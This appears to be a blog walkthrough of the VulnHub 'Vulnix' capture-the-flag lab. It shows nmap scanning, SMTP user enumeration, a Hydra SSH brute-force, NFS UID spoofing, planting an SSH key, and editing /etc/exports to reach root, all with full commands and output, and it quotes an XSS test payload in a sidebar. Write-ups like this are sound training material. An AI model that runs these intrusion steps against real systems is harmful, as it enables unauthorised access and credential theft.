Thursday, October 10, 2019

VulnHub: Vulnix Walkthrough

Let first start off with an nmap scan of the remote host. 
root@ubuntu:~/src# nmap -p0-65355 -sV -O -sC -T5 192.168.56.107

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-09 12:37 MDT
Warning: 192.168.56.107 giving up on port because retransmission cap hit (2).
Stats: 0:00:18 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 13.56% done; ETC: 12:39 (0:01:48 remaining)
Stats: 0:04:01 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.74% done; ETC: 12:41 (0:00:00 remaining)
Nmap scan report for 192.168.56.107
Host is up (0.00069s latency).
Not shown: 65319 closed ports
PORT      STATE    SERVICE    VERSION
22/tcp    open     ssh        OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
|   2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_  256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp    open     smtp       Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
|_ssl-date: 2019-10-09T18:40:57+00:00; -2s from scanner time.
79/tcp    open     finger     Linux fingerd
|_finger: No one logged on.\x0D
110/tcp   open     pop3       Dovecot pop3d
|_pop3-capabilities: CAPA TOP SASL RESP-CODES STLS UIDL PIPELINING
|_ssl-date: 2019-10-09T18:40:57+00:00; -2s from scanner time.
111/tcp   open     rpcbind    2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      36380/tcp  mountd
|   100005  1,2,3      52886/udp  mountd
|   100021  1,3,4      52205/udp  nlockmgr
|   100021  1,3,4      52432/tcp  nlockmgr
|   100024  1          35179/udp  status
|   100024  1          41320/tcp  status
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
143/tcp   open     imap       Dovecot imapd
|_imap-capabilities: ID have SASL-IR capabilities OK more listed post-login Pre-login IMAP4rev1 STARTTLS LOGIN-REFERRALS IDLE LOGINDISABLEDA0001 LITERAL+ ENABLE
|_ssl-date: 2019-10-09T18:40:57+00:00; -2s from scanner time.
512/tcp   open     exec       netkit-rsh rexecd
513/tcp   open     login
514/tcp   open     shell      Netkit rshd
993/tcp   open     ssl/imaps?
|_ssl-date: 2019-10-09T18:40:56+00:00; -2s from scanner time.
995/tcp   open     ssl/pop3s?
|_ssl-date: 2019-10-09T18:40:56+00:00; -2s from scanner time.
2049/tcp  open     nfs_acl    2-3 (RPC #100227)
36380/tcp open     mountd     1-3 (RPC #100005)
41320/tcp open     status     1 (RPC #100024)
46857/tcp open     mountd     1-3 (RPC #100005)
52432/tcp open     nlockmgr   1-4 (RPC #100021)
57416/tcp open     mountd     1-3 (RPC #100005)
MAC Address: 08:00:27:F0:66:94 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host:  vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -2s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 341.14 seconds
root@ubuntu:~/src#

We found quite a few open ports on the remote machine 22,25,79,110,111,143,512,513,514. our next task is to enuermate users on the system with smtp and the VRFY command. 

root@ubuntu:~/src# smtp-user-enum -M VRFY -U /home/sam/wordlists/unix_users.txt -t 192.168.56.107
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... /home/sam/wordlists/unix_users.txt
Target count ............. 1
Username count ........... 113
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ 

######## Scan started at Wed Oct  9 14:19:55 2019 #########
192.168.56.107: ROOT exists
192.168.56.107: backup exists
192.168.56.107: bin exists
192.168.56.107: daemon exists
192.168.56.107: games exists
192.168.56.107: gnats exists
192.168.56.107: irc exists
192.168.56.107: libuuid exists
192.168.56.107: list exists
192.168.56.107: lp exists
192.168.56.107: man exists
192.168.56.107: mail exists
192.168.56.107: news exists
192.168.56.107: messagebus exists
192.168.56.107: nobody exists
192.168.56.107: postmaster exists
192.168.56.107: proxy exists
192.168.56.107: root exists
192.168.56.107: sshd exists
192.168.56.107: sync exists
192.168.56.107: sys exists
192.168.56.107: syslog exists
192.168.56.107: uucp exists
192.168.56.107: user exists
192.168.56.107: www-data exists
######## Scan completed at Wed Oct  9 14:19:56 2019 #########
25 results.

113 queries in 1 seconds (113.0 queries / sec)
root@ubuntu:~/src#

As you can see we have found a few users that exists on the system but the 'user' user catches my eye and I move on to brute forcing the user over ssh. 

root@ubuntu:~/src# hydra -l user -P /home/sam/wordlists/unix_passwords.txt ssh://192.168.56.107 -t 4
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2019-10-09 17:23:01
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 1009 login tries (l:1/p:1009), ~253 tries per task
[DATA] attacking ssh://192.168.56.107:22/
[STATUS] 64.00 tries/min, 64 tries in 00:01h, 945 to do in 00:15h, 4 active
[STATUS] 61.33 tries/min, 184 tries in 00:03h, 825 to do in 00:14h, 4 active
[STATUS] 60.00 tries/min, 420 tries in 00:07h, 589 to do in 00:10h, 4 active
[22][ssh] host: 192.168.56.107   login: user   password: letmein
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-10-09 17:31:52
root@ubuntu:~/src#

We cracked the user. no its time to login and see what we can find. 

root@ubuntu:~/src# ssh user@192.168.56.107
The authenticity of host '192.168.56.107 (192.168.56.107)' can't be established.
ECDSA key fingerprint is SHA256:IGOuLMZRTuUvY58a8TN+ef/1zyRCAHk0qYP4wMViOAg.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.107' (ECDSA) to the list of known hosts.
user@192.168.56.107's password: 
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Thu Oct 10 19:51:01 BST 2019

  System load:  0.08             Processes:           89
  Usage of /:   90.2% of 773MB   Users logged in:     0
  Memory usage: 3%               IP address for eth0: 192.168.56.107
  Swap usage:   0%

  => / is using 90.2% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/

user@vulnix:~$

Out first step is to cat the /etc/passwd file to see if we have any more users on the system to be enumerated.

user@vulnix:/home$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
postfix:x:104:110::/var/spool/postfix:/bin/false
dovecot:x:105:112:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:106:65534:Dovecot login user,,,:/nonexistent:/bin/false
landscape:x:107:113::/var/lib/landscape:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
vulnix:x:2008:2008::/home/vulnix:/bin/bash
statd:x:109:65534::/var/lib/nfs:/bin/false
user@vulnix:/home$

Only two regular users exist vulnix and user. So lets now search for suid binaries.

user@vulnix:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/bin/mtr
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/at
/usr/bin/sudoedit
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/procmail
/bin/ping6
/bin/mount
/bin/umount
/bin/su
/bin/ping
/bin/fusermount
user@vulnix:~$

We check sudo privleges

user@vulnix:~$ sudo -l
[sudo] password for user: 
Sorry, user user may not run sudo on vulnix.
user@vulnix:~$

No sudo rights on this user lets try to enter in to the vulnix directory

user@vulnix:~$ cd /home;ls -la
total 16
drwxr-xr-x  4 root   root   4096 Sep  2  2012 .
drwxr-xr-x 22 root   root   4096 Sep  2  2012 ..
drwxr-x---  3 user   user   4096 Sep  2  2012 user
drwxr-x---  2 vulnix vulnix 4096 Sep  2  2012 vulnix
user@vulnix:/home$ cd vulnix/
-bash: cd: vulnix/: Permission denied
user@vulnix:/home$

Nothing interesting here so lets move on to the next service NFS.

Enumerating NFS

First we query the remote host with rpcinfo to verify NFS is running. 

root@ubuntu:~/src# rpcinfo -p 192.168.56.107
   program vers proto   port  service
    100000    4   tcp    111  portmapper
    100000    3   tcp    111  portmapper
    100000    2   tcp    111  portmapper
    100000    4   udp    111  portmapper
    100000    3   udp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp  44702  status
    100024    1   tcp  40130  status
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
    100227    2   tcp   2049
    100227    3   tcp   2049
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100003    4   udp   2049  nfs
    100227    2   udp   2049
    100227    3   udp   2049
    100021    1   udp  38605  nlockmgr
    100021    3   udp  38605  nlockmgr
    100021    4   udp  38605  nlockmgr
    100021    1   tcp  56235  nlockmgr
    100021    3   tcp  56235  nlockmgr
    100021    4   tcp  56235  nlockmgr
    100005    1   udp  57530  mountd
    100005    1   tcp  35549  mountd
    100005    2   udp  56428  mountd
    100005    2   tcp  53138  mountd
    100005    3   udp  56870  mountd
    100005    3   tcp  60835  mountd
root@ubuntu:~/src# 

root@ubuntu:~/src# rpcinfo -n 2049 -t 192.168.56.107 100003
program 100003 version 2 ready and waiting
program 100003 version 3 ready and waiting
program 100003 version 4 ready and waiting
root@ubuntu:~/src#

Once we know its up and running we can use the showmount command to see what shares if any it has avaiable. 

root@ubuntu:~/src# showmount -e 192.168.56.107
Export list for 192.168.56.107:
/home/vulnix *
root@ubuntu:~/src#

We can see they are sharing the /home/vulnix directory lets try and mount the share to see whats in it. 

root@ubuntu:~# mkdir /mnt/loot
root@ubuntu:~# mount -t nfs 192.168.56.107:/home/vulnix /mnt/loot
root@ubuntu:~# cd /mnt/loot
bash: cd: /mnt/loot: Permission denied
root@ubuntu:~#

We get permission denied when we try to access the remote mounted share. What we need is a user with the same UID as the vulnix user if you remember we got the UID of vulnix when we cat'd the /etc/passwd file. 

vulnix:x:2008:2008::/home/vulnix:/bin/bash

We can add a user and specify the UID with the useradd utility 

useradd -u 2008 vulnix

Once we have the user added we can su to the user vulnix and try to browse the share 

$ whoami
vulnix
$ id
uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix)
$ ls -la
total 28
drwxr-x--- 4 vulnix vulnix 4096 Oct 10 13:35 .
drwxr-xr-x 4 root   root   4096 Oct 10 13:23 ..
-rw-r--r-- 1 vulnix vulnix  220 Apr  3  2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Apr  3  2012 .bashrc
drwx------ 2 vulnix vulnix 4096 Oct 10 13:35 .cache
-rw-r--r-- 1 vulnix vulnix  675 Apr  3  2012 .profile
$

Our next task is to create a new ssh key to import in to the local .ssh direcotry on the remote share so we can login with our own password for this we will use ssh-keygen. 

root@ubuntu:~/src# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
/root/.ssh/id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:R5ZR6Rzd62GVXiKOsqqDMgZHqlfA6GYJh3q5/K1eAc4 root@ubuntu
The key's randomart image is:
+---[RSA 2048]----+
|          ...o ..|
|           o+ o.+|
| +  .     += o..+|
|+ =o .  .o. +  = |
|++.oE . So.   o .|
|+=+ .  ...     . |
|=+ +  ..         |
|+.= .o.          |
|.+ o=+.          |
+----[SHA256]-----+
root@ubuntu:~/src#

Once we have the key generated we can import it in to the ssh directory. The .ssh directory doesnt exist yet so we will have to create it. 

$ mkdir .ssh
$ cd .ssh
$ echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC4O6oOf9oTUAvCdOdbsZYhyETxoNFAlCRx1oRknqUsk790zXPg7zYdZnH7XXQ5o54PJzaJoc2pR96cpIW2RX1Hy7ompbNJS1H03evtJXp73/xYJxbdj3IRqT/6V1y+/oh4SmUMA5MAzLUQa3OMrseAN/a1nWivgUuKoNscKf+ej5oKTDkn5a5avtnyzJhKz+tYdSZ/oU1dXp9WVp5SoXH1+OLOQLbvvzLrvzVbzyOaA1M3pQV8y83YQnBc0P6bJfzoem7tRI2w9lCgHenFnKkf9z9euUFkSBACriZc/f5mUhUZ2T8OwjvHufBSsd3zG1iglzV1ZXLBvTwrdFpiAx7l root@ubuntu > .ssh/authorized_keys

Now that we have our key succesfully imported its time to login and see if it worked. 

root@ubuntu:/root/.ssh# ssh vulnix@192.168.56.107
Enter passphrase for key '/root/.ssh/id_rsa': 
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Thu Oct 10 20:35:53 BST 2019

  System load:  0.0              Processes:           88
  Usage of /:   90.2% of 773MB   Users logged in:     0
  Memory usage: 4%               IP address for eth0: 192.168.56.107
  Swap usage:   0%

  => / is using 90.2% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

vulnix@vulnix:~$

It Worked! so now we move on to enumerating the vulnix user to try and eleveate our priveleges. 

vulnix@vulnix:~$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User vulnix may run the following commands on this host:
    (root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
vulnix@vulnix:~$

We can edit the /etc/exports file which contains configuration data for the nfs services. 

# /etc/exports: the access control list for filesystems which may be exported
#               to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix    *(rw,root_squash)

As you can see the configuration for the /home/vulnix share has root_squash enabled.vBy default, NFS shares change the root user to the nfsnobody user, an unprivileged user account. In this way, all root-created files are owned by nfsnobody. If no_root_squash is used, remote root users are able to change any file on the shared file system.

we want to add an entry in the exports file that allows us full access to the remote share using the root_no_squash option.

After this you have to restart the vm manually for the changes to take effect

root@ubuntu:/root/.ssh# showmount -e 192.168.56.107
Export list for 192.168.56.107:
/root        *
/home/vulnix *
root@ubuntu:/root/.ssh# mount -t nfs 192.168.56.107:/root /mnt/loot/
root@ubuntu:/root/.ssh# cd /mnt/loot/
root@ubuntu:/mnt/loot# ls -la
total 28
drwx------ 3 root root 4096 Sep  2  2012 .
drwxr-xr-x 4 root root 4096 Oct 10 13:23 ..
-rw------- 1 root root    0 Sep  2  2012 .bash_history
-rw-r--r-- 1 root root 3106 Apr 19  2012 .bashrc
drwx------ 2 root root 4096 Sep  2  2012 .cache
-rw-r--r-- 1 root root  140 Apr 19  2012 .profile
-r-------- 1 root root   33 Sep  2  2012 trophy.txt
-rw------- 1 root root  710 Sep  2  2012 .viminfo
root@ubuntu:/mnt/loot# cat trophy.txt 
cc614640424f5bd60ce5d5264899c3be
root@ubuntu:/mnt/loot#

As you can see we successfully got the flag.

at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...

  • Enumerating SNMP Servers with NMAP
    NMAP gives you the ability to use scripts to enumerate and exploit remote host with the use of the NMAP Scripting Engine. Today we will be ...
  • Exploring POP3 Servers
    Scanning the remote host We can use NMAP to scan the remote host and run enumeration scripts against the POP3 server. root@asus:~/unix% ...
  • Enumerating SMTP Servers with NMAP
    NMAP gives you the ability to enumerate SMTP service with some scripts from the NMAP Scripting Enigne. These scripts will produce some gene...
  • Testing LDAP servers with examples
    Today we are going to be attacking the remote service LDAP. The only thing we need is an IP Address so lets ping our host to verify its up ...
  • Enumerating UNIX usernames
    Sometimes you may come across a situation where all you have from your OSINT phase is a list of first and last names. you can use pre-built...
  • Metasploitable II: Samba Shares
    Lets first start off with an nmap scan of the remote host. root@ubuntu:~# nmap -p 139,445 -sV -sC 192.168.56.101 Starting Nmap 7.60 ( ht...
  • DVWA: File Upload
    Our goal is to exploit the weakness in file upload checking and obtain a remote system shell on the host. We start off with the security b...
  • bWAPP XSS Injections
    Cross-site-Scripting - Reflected (GET) Payload: <script>alert(1)</script> Cross-site-Scripting - Reflected (POST) Payload:...
  • bWAPP Remote & Local File Inclusion (RFI/LFI)
    In bWAPP There is a module for RFI and LFI injections. Our goal is to exploit these vulnerabilities and get local access to the remote mac...
  • bWAPP CSRF
    CSRF (Change Password) The first challenge is the change password CSRF. Our goal is to successfully change the users password with out log...